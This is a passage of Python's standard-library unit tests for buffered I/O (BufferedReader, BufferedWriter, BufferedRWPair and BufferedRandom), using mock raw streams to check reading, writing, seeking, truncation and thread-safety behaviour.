self.assertEqual(b"efg", bufio.read1(-1)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1()) self.assertEqual(rawio._reads, 4) def test_readinto(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) b = bytearray(2) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"cd") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ef") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"gf") self.assertEqual(bufio.readinto(b), 0) self.assertEqual(b, b"gf") rawio = self.MockRawIO((b"abc", None)) bufio = self.tp(rawio) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"cb") def test_readinto1(self): buffer_size = 10 rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl")) bufio = self.tp(rawio, buffer_size=buffer_size) b = bytearray(2) self.assertEqual(bufio.peek(3), b'abc') self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"ab") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 1) self.assertEqual(b[:1], b"c") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"de") self.assertEqual(rawio._reads, 2) b = bytearray(2*buffer_size) self.assertEqual(bufio.peek(3), b'fgh') self.assertEqual(rawio._reads, 3) self.assertEqual(bufio.readinto1(b), 6) self.assertEqual(b[:6], b"fghjkl") self.assertEqual(rawio._reads, 4) def test_readinto_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readinto1_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto1(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readlines(self): def bufio(): rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef")) return self.tp(rawio) self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"]) self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"]) self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"]) def test_buffering(self): data = b"abcdefghi" dlen = len(data) tests = [ [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ], [ 100, [ 3, 3, 3], [ dlen ] ], [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ], ] for bufsize, buf_read_sizes, raw_read_sizes in tests: rawio = self.MockFileIO(data) bufio = self.tp(rawio, buffer_size=bufsize) pos = 0 for nbytes in buf_read_sizes: self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes]) pos += nbytes # this is mildly implementation-dependent self.assertEqual(rawio.read_history, raw_read_sizes) def test_read_non_blocking(self): # Inject some None's in there to simulate EWOULDBLOCK rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None)) bufio = self.tp(rawio) self.assertEqual(b"abcd", bufio.read(6)) self.assertEqual(b"e", bufio.read(1)) self.assertEqual(b"fg", bufio.read()) self.assertEqual(b"", bufio.peek(1)) self.assertIsNone(bufio.read()) self.assertEqual(b"", bufio.read()) rawio = self.MockRawIO((b"a", None, None)) self.assertEqual(b"a", rawio.readall()) self.assertIsNone(rawio.readall()) def test_read_past_eof(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(9000)) def test_read_all(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read()) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes with exactly the same number of 0's, # 1's... 255's. This will help us check that concurrent reading # doesn't duplicate or forget contents. N = 1000 l = list(range(256)) * N random.shuffle(l) s = bytes(bytearray(l)) with self.open(os_helper.TESTFN, "wb") as f: f.write(s) with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] results = [] def f(): try: # Intra-buffer read then buffer-flushing read for n in cycle([1, 19]): s = bufio.read(n) if not s: break # list.append() is atomic results.append(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) s = b''.join(results) for i in range(256): c = bytes(bytearray([i])) self.assertEqual(s.count(c), N) finally: os_helper.unlink(os_helper.TESTFN) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) bufio.read(1) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) self.assertRaises(self.UnsupportedOperation, bufio.tell) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) # Silence destructor error bufio.close = lambda: None def test_no_extraneous_read(self): # Issue #9550; when the raw IO object has satisfied the read request, # we should not issue any additional reads, otherwise it may block # (e.g. socket). bufsize = 16 for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2): rawio = self.MockRawIO([b"x" * n]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) # Simple case: one raw read is enough to satisfy the request. self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) # A more complex case where two raw reads are needed to satisfy # the request. rawio = self.MockRawIO([b"x" * (n - 1), b"x"]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) def test_read_on_closed(self): # Issue #23796 b = io.BufferedReader(io.BytesIO(b"12")) b.read(1) b.close() self.assertRaises(ValueError, b.peek) self.assertRaises(ValueError, b.read1, 1) def test_truncate_on_read_only(self): rawio = self.MockFileIO(b"abc") bufio = self.tp(rawio) self.assertFalse(bufio.writable()) self.assertRaises(self.UnsupportedOperation, bufio.truncate) self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0) class CBufferedReaderTest(BufferedReaderTest, SizeofTest): tp = io.BufferedReader @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedReaderTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.read) def test_misbehaved_io_read(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) # _pyio.BufferedReader seems to implement reading different, so that # checking this is not so easy. self.assertRaises(OSError, bufio.read, 10) def test_garbage_collection(self): # C BufferedReader objects are collected. # The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(os_helper.unlink, os_helper.TESTFN) with warnings_helper.check_warnings(('', ResourceWarning)): rawio = self.FileIO(os_helper.TESTFN, "w+b") f = self.tp(rawio) f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedReader"): self.tp(io.BytesIO(), 1024, 1024, 1024) def test_bad_readinto_value(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: -1 bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsNone(cm.exception.__cause__) def test_bad_readinto_type(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: b'' bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsInstance(cm.exception.__cause__, TypeError) class PyBufferedReaderTest(BufferedReaderTest): tp = pyio.BufferedReader class BufferedWriterTest(unittest.TestCase, CommonBufferedTests): write_mode = "wb" def test_constructor(self): rawio = self.MockRawIO() bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(3, bufio.write(b"abc")) bufio.flush() self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) bufio.__init__(rawio) self.assertEqual(3, bufio.write(b"ghi")) bufio.flush() self.assertEqual(b"".join(rawio._write_stack), b"abcghi") def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.write, b'') bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.write(b''), 0) def test_detach_flush(self): raw = self.MockRawIO() buf = self.tp(raw) buf.write(b"howdy!") self.assertFalse(raw._write_stack) buf.detach() self.assertEqual(raw._write_stack, [b"howdy!"]) def test_write(self): # Write to the buffered IO but don't overflow the buffer. writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") self.assertFalse(writer._write_stack) buffer = bytearray(b"def") bufio.write(buffer) buffer[:] = b"***" # Overwrite our copy of the data bufio.flush() self.assertEqual(b"".join(writer._write_stack), b"abcdef") def test_write_overflow(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) contents = b"abcdefghijklmnop" for n in range(0, len(contents), 3): bufio.write(contents[n:n+3]) flushed = b"".join(writer._write_stack) # At least (total - 8) bytes were implicitly flushed, perhaps more # depending on the implementation. self.assertTrue(flushed.startswith(contents[:-8]), flushed) def check_writes(self, intermediate_func): # Lots of writes, test the flushed output is as expected. contents = bytes(range(256)) * 1000 n = 0 writer = self.MockRawIO() bufio = self.tp(writer, 13) # Generator of write sizes: repeat each N 15 times then proceed to N+1 def gen_sizes(): for size in count(1): for i in range(15): yield size sizes = gen_sizes() while n < len(contents): size = min(next(sizes), len(contents) - n) self.assertEqual(bufio.write(contents[n:n+size]), size) intermediate_func(bufio) n += size bufio.flush() self.assertEqual(contents, b"".join(writer._write_stack)) def test_writes(self): self.check_writes(lambda bufio: None) def test_writes_and_flushes(self): self.check_writes(lambda bufio: bufio.flush()) def test_writes_and_seeks(self): def _seekabs(bufio): pos = bufio.tell() bufio.seek(pos + 1, 0) bufio.seek(pos - 1, 0) bufio.seek(pos, 0) self.check_writes(_seekabs) def _seekrel(bufio): pos = bufio.seek(0, 1) bufio.seek(+1, 1) bufio.seek(-1, 1) bufio.seek(pos, 0) self.check_writes(_seekrel) def test_writes_and_truncates(self): self.check_writes(lambda bufio: bufio.truncate(bufio.tell())) def test_write_non_blocking(self): raw = self.MockNonBlockWriterIO() bufio = self.tp(raw, 8) self.assertEqual(bufio.write(b"abcd"), 4) self.assertEqual(bufio.write(b"efghi"), 5) # 1 byte will be written, the rest will be buffered raw.block_on(b"k") self.assertEqual(bufio.write(b"jklmn"), 5) # 8 bytes will be written, 8 will be buffered and the rest will be lost raw.block_on(b"0") try: bufio.write(b"opqrwxyz0123456789") except self.BlockingIOError as e: written = e.characters_written else: self.fail("BlockingIOError should have been raised") self.assertEqual(written, 16) self.assertEqual(raw.pop_written(), b"abcdefghijklmnopqrwxyz") self.assertEqual(bufio.write(b"ABCDEFGHI"), 9) s = raw.pop_written() # Previously buffered bytes were flushed self.assertTrue(s.startswith(b"01234567A"), s) def test_write_and_rewind(self): raw = io.BytesIO() bufio = self.tp(raw, 4) self.assertEqual(bufio.write(b"abcdef"), 6) self.assertEqual(bufio.tell(), 6) bufio.seek(0, 0) self.assertEqual(bufio.write(b"XY"), 2) bufio.seek(6, 0) self.assertEqual(raw.getvalue(), b"XYcdef") self.assertEqual(bufio.write(b"123456"), 6) bufio.flush() self.assertEqual(raw.getvalue(), b"XYcdef123456") def test_flush(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") bufio.flush() self.assertEqual(b"abc", writer._write_stack[0]) def test_writelines(self): l = [b'ab', b'cd', b'ef'] writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_userlist(self): l = UserList([b'ab', b'cd', b'ef']) writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_error(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) self.assertRaises(TypeError, bufio.writelines, [1, 2, 3]) self.assertRaises(TypeError, bufio.writelines, None) self.assertRaises(TypeError, bufio.writelines, 'abc') def test_destructor(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") del bufio support.gc_collect() self.assertEqual(b"abc", writer._write_stack[0]) def test_truncate(self): # Truncate implicitly flushes the buffer. self.addCleanup(os_helper.unlink, os_helper.TESTFN) with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) bufio.write(b"abcdef") self.assertEqual(bufio.truncate(3), 3) self.assertEqual(bufio.tell(), 6) with self.open(os_helper.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.read(), b"abc") def test_truncate_after_write(self): # Ensure that truncate preserves the file position after # writes longer than the buffer size. # Issue: https://bugs.python.org/issue32228 self.addCleanup(os_helper.unlink, os_helper.TESTFN) with self.open(os_helper.TESTFN, "wb") as f: # Fill with some buffer f.write(b'\x00' * 10000) buffer_sizes = [8192, 4096, 200] for buffer_size in buffer_sizes: with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f: f.write(b'\x00' * (buffer_size + 1)) # After write write_pos and write_end are set to 0 f.read(1) # read operation makes sure that pos != raw_pos f.truncate() self.assertEqual(f.tell(), buffer_size + 2) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes from many threads and test they were # all flushed. N = 1000 contents = bytes(range(256)) * N sizes = cycle([1, 19]) n = 0 queue = deque() while n < len(contents): size = next(sizes) queue.append(contents[n:n+size]) n += size del contents # We use a real file object because it allows us to # exercise situations where the GIL is released before # writing the buffer to the raw streams. This is in addition # to concurrency issues due to switching threads in the middle # of Python code. with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] def f(): try: while True: try: s = queue.popleft() except IndexError: return bufio.write(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) bufio.close() with self.open(os_helper.TESTFN, "rb") as f: s = f.read() for i in range(256): self.assertEqual(s.count(bytes([i])), N) finally: os_helper.unlink(os_helper.TESTFN) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO() bufio = self.tp(rawio, 5) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) self.assertRaises(OSError, bufio.write, b"abcdef") # Silence destructor error bufio.close = lambda: None def test_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), 8, 12) def test_write_error_on_close(self): raw = self.MockRawIO() def bad_write(b): raise OSError() raw.write = bad_write b = self.tp(raw) b.write(b'spam') self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) def test_slow_close_from_thread(self): # Issue #31976 rawio = self.SlowFlushRawIO() bufio = self.tp(rawio, 8) t = threading.Thread(target=bufio.close) t.start() rawio.in_flush.wait() self.assertRaises(ValueError, bufio.write, b'spam') self.assertTrue(bufio.closed) t.join() class CBufferedWriterTest(BufferedWriterTest, SizeofTest): tp = io.BufferedWriter @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedWriterTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.write, b"def") self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.write, b"def") self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.write, b"def") def test_garbage_collection(self): # C BufferedWriter objects are collected, and collecting them flushes # all data to disk. # The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(os_helper.unlink, os_helper.TESTFN) with warnings_helper.check_warnings(('', ResourceWarning)): rawio = self.FileIO(os_helper.TESTFN, "w+b") f = self.tp(rawio) f.write(b"123xxx") f.x = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"123xxx") def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedWriter"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedWriterTest(BufferedWriterTest): tp = pyio.BufferedWriter class BufferedRWPairTest(unittest.TestCase): def test_constructor(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.closed) def test_uninitialized(self): pair = self.tp.__new__(self.tp) del pair pair = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', pair.read, 0) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', pair.write, b'') pair.__init__(self.MockRawIO(), self.MockRawIO()) self.assertEqual(pair.read(0), b'') self.assertEqual(pair.write(b''), 0) def test_detach(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertRaises(self.UnsupportedOperation, pair.detach) def test_constructor_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12) def test_constructor_with_not_readable(self): class NotReadable(MockRawIO): def readable(self): return False self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO()) def test_constructor_with_not_writeable(self): class NotWriteable(MockRawIO): def writable(self): return False self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable()) def test_read(self): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertEqual(pair.read(3), b"abc") self.assertEqual(pair.read(1), b"d") self.assertEqual(pair.read(), b"ef") pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO()) self.assertEqual(pair.read(None), b"abc") def test_readlines(self): pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO()) self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"]) self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"]) self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"]) def test_read1(self): # .read1() is delegated to the underlying reader object, so this test # can be shallow. pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertEqual(pair.read1(3), b"abc") self.assertEqual(pair.read1(), b"def") def test_readinto(self): for method in ("readinto", "readinto1"): with self.subTest(method): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) data = byteslike(b'\0' * 5) self.assertEqual(getattr(pair, method)(data), 5) self.assertEqual(bytes(data), b"abcde") def test_write(self): w = self.MockRawIO() pair = self.tp(self.MockRawIO(), w) pair.write(b"abc") pair.flush() buffer = bytearray(b"def") pair.write(buffer) buffer[:] = b"***" # Overwrite our copy of the data pair.flush() self.assertEqual(w._write_stack, [b"abc", b"def"]) def test_peek(self): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertTrue(pair.peek(3).startswith(b"abc")) self.assertEqual(pair.read(3), b"abc") def test_readable(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertTrue(pair.readable()) def test_writeable(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertTrue(pair.writable()) def test_seekable(self): # BufferedRWPairs are never seekable, even if their readers and writers # are. pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.seekable()) # .flush() is delegated to the underlying writer object and has been # tested in the test_write method. def test_close_and_closed(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.closed) pair.close() self.assertTrue(pair.closed) def test_reader_close_error_on_close(self): def reader_close(): reader_non_existing reader = self.MockRawIO() reader.close = reader_close writer = self.MockRawIO() pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('reader_non_existing', str(err.exception)) self.assertTrue(pair.closed) self.assertFalse(reader.closed) self.assertTrue(writer.closed) # Silence destructor error reader.close = lambda: None def test_writer_close_error_on_close(self): def writer_close(): writer_non_existing reader = self.MockRawIO() writer = self.MockRawIO() writer.close = writer_close pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('writer_non_existing', str(err.exception)) self.assertFalse(pair.closed) self.assertTrue(reader.closed) self.assertFalse(writer.closed) # Silence destructor error writer.close = lambda: None writer = None # Ignore BufferedWriter (of the BufferedRWPair) unraisable exception with support.catch_unraisable_exception(): # Ignore BufferedRWPair unraisable exception with support.catch_unraisable_exception(): pair = None support.gc_collect() support.gc_collect() def test_reader_writer_close_error_on_close(self): def reader_close(): reader_non_existing def writer_close(): writer_non_existing reader = self.MockRawIO() reader.close = reader_close writer = self.MockRawIO() writer.close = writer_close pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('reader_non_existing', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('writer_non_existing', str(err.exception.__context__)) self.assertFalse(pair.closed) self.assertFalse(reader.closed) self.assertFalse(writer.closed) # Silence destructor error reader.close = lambda: None writer.close = lambda: None def test_isatty(self): class SelectableIsAtty(MockRawIO): def __init__(self, isatty): MockRawIO.__init__(self) self._isatty = isatty def isatty(self): return self._isatty pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False)) self.assertFalse(pair.isatty()) pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False)) self.assertTrue(pair.isatty()) pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True)) self.assertTrue(pair.isatty()) pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True)) self.assertTrue(pair.isatty()) def test_weakref_clearing(self): brw = self.tp(self.MockRawIO(), self.MockRawIO()) ref = weakref.ref(brw) brw = None ref = None # Shouldn't segfault. class CBufferedRWPairTest(BufferedRWPairTest): tp = io.BufferedRWPair class PyBufferedRWPairTest(BufferedRWPairTest): tp = pyio.BufferedRWPair class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest): read_mode = "rb+" write_mode = "wb+" def test_constructor(self): BufferedReaderTest.test_constructor(self) BufferedWriterTest.test_constructor(self) def test_uninitialized(self): BufferedReaderTest.test_uninitialized(self) BufferedWriterTest.test_uninitialized(self) def test_read_and_write(self): raw = self.MockRawIO((b"asdf", b"ghjk")) rw = self.tp(raw, 8) self.assertEqual(b"as", rw.read(2)) rw.write(b"ddd") rw.write(b"eee") self.assertFalse(raw._write_stack) # Buffer writes self.assertEqual(b"ghjk", rw.read()) self.assertEqual(b"dddeee", raw._write_stack[0]) def test_seek_and_tell(self): raw = self.BytesIO(b"asdfghjkl") rw = self.tp(raw) self.assertEqual(b"as", rw.read(2)) self.assertEqual(2, rw.tell()) rw.seek(0, 0) self.assertEqual(b"asdf", rw.read(4)) rw.write(b"123f") rw.seek(0, 0) self.assertEqual(b"asdf123fl", rw.read()) self.assertEqual(9, rw.tell()) rw.seek(-4, 2) self.assertEqual(5, rw.tell()) rw.seek(2, 1) self.assertEqual(7, rw.tell()) self.assertEqual(b"fl", rw.read(11)) rw.flush() self.assertEqual(b"asdf123fl", raw.getvalue()) self.assertRaises(TypeError, rw.seek, 0.0) def check_flush_and_read(self, read_func): raw = self.BytesIO(b"abcdefghi") bufio = self.tp(raw) self.assertEqual(b"ab", read_func(bufio, 2)) bufio.write(b"12") self.assertEqual(b"ef", read_func(bufio, 2)) self.assertEqual(6, bufio.tell()) bufio.flush() self.assertEqual(6, bufio.tell()) self.assertEqual(b"ghi", read_func(bufio)) raw.seek(0, 0) raw.write(b"XYZ") # flush() resets the read buffer bufio.flush() bufio.seek(0, 0) self.assertEqual(b"XYZ", read_func(bufio, 3)) def test_flush_and_read(self): self.check_flush_and_read(lambda bufio, *args: bufio.read(*args)) def test_flush_and_readinto(self): def _readinto(bufio, n=-1): b = bytearray(n if n >= 0 else 9999) n = bufio.readinto(b) return bytes(b[:n]) self.check_flush_and_read(_readinto) def test_flush_and_peek(self): def _peek(bufio, n=-1): # This relies on the fact that the buffer can contain the whole # raw stream, otherwise peek() can return less. b = bufio.peek(n) if n != -1: b = b[:n] bufio.seek(len(b), 1) return b self.check_flush_and_read(_peek) def test_flush_and_write(self): raw = self.BytesIO(b"abcdefghi") bufio = self.tp(raw) bufio.write(b"123") bufio.flush() bufio.write(b"45") bufio.flush() bufio.seek(0, 0) self.assertEqual(b"12345fghi", raw.getvalue()) self.assertEqual(b"12345fghi", bufio.read()) def test_threads(self): BufferedReaderTest.test_threads(self) BufferedWriterTest.test_threads(self) def test_writes_and_peek(self): def _peek(bufio): bufio.peek(1) self.check_writes(_peek) def _peek(bufio): pos = bufio.tell() bufio.seek(-1, 1) bufio.peek(1) bufio.seek(pos, 0) self.check_writes(_peek) def test_writes_and_reads(self): def _read(bufio): bufio.seek(-1, 1) bufio.read(1) self.check_writes(_read) def test_writes_and_read1s(self): def _read1(bufio): bufio.seek(-1, 1) bufio.read1(1) self.check_writes(_read1) def test_writes_and_readintos(self): def _read(bufio): bufio.seek(-1, 1) bufio.readinto(bytearray(1)) self.check_writes(_read) def test_write_after_readahead(self): # Issue #6629: writing after the buffer was filled by readahead should # first rewind the raw stream. for overwrite_size in [1, 5]: raw = self.BytesIO(b"A" * 10) bufio = self.tp(raw, 4) # Trigger readahead self.assertEqual(bufio.read(1), b"A") self.assertEqual(bufio.tell(), 1) # Overwriting should rewind the raw stream if it needs so bufio.write(b"B" * overwrite_size) self.assertEqual(bufio.tell(), overwrite_size + 1) # If the write size was smaller than the buffer size, flush() and # check that rewind happens. bufio.flush() self.assertEqual(bufio.tell(), overwrite_size + 1) s = raw.getvalue() self.assertEqual(s, b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size)) def test_write_rewind_write(self): # Various combinations of reading / writing / seeking backwards / writing again def mutate(bufio, pos1, pos2): assert pos2 >= pos1 # Fill the buffer bufio.seek(pos1) bufio.read(pos2 - pos1) bufio.write(b'\x02') # This writes earlier than the previous write, but still inside # the buffer. bufio.seek(pos1) bufio.write(b'\x01') b = b"\x80\x81\x82\x83\x84" for i in range(0, len(b)): for j in range(i, len(b)): raw = self.BytesIO(b) bufio = self.tp(raw, 100) mutate(bufio, i, j) bufio.flush() expected = bytearray(b) expected[j] = 2 expected[i] = 1 self.assertEqual(raw.getvalue(), expected, "failed result for i=%d, j=%d" % (i, j)) def test_truncate_after_read_or_write(self): raw = self.BytesIO(b"A" * 10) bufio = self.tp(raw, 100) self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled self.assertEqual(bufio.truncate(), 2) self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases self.assertEqual(bufio.truncate(), 4) def test_misbehaved_io(self): BufferedReaderTest.test_misbehaved_io(self) BufferedWriterTest.test_misbehaved_io(self) def test_interleaved_read_write(self): # Test for issue #12213 with self.BytesIO(b'abcdefgh') as raw: with self.tp(raw, 100) as f: f.write(b"1") self.assertEqual(f.read(1), b'b') f.write(b'2') self.assertEqual(f.read1(1), b'd') f.write(b'3') buf = bytearray(1) f.readinto(buf) self.assertEqual(buf, b'f') f.write(b'4') self.assertEqual(f.peek(1), b'h') f.flush() self.assertEqual(raw.getvalue(), b'1b2d3f4h') with self.BytesIO(b'abc') as raw: with self.tp(raw, 100) as f: self.assertEqual(f.read(1), b'a') f.write(b"2") self.assertEqual(f.read(1), b'c') f.flush() self.assertEqual(raw.getvalue(), b'a2c') def test_interleaved_readline_write(self): with self.BytesIO(b'ab\ncdef\ng\n') as raw: with self.tp(raw) as f: f.write(b'1') self.assertEqual(f.readline(), b'b\n') f.write(b'2') self.assertEqual(f.readline(), b'def\n') f.write(b'3') self.assertEqual(f.readline(), b'\n') f.flush() 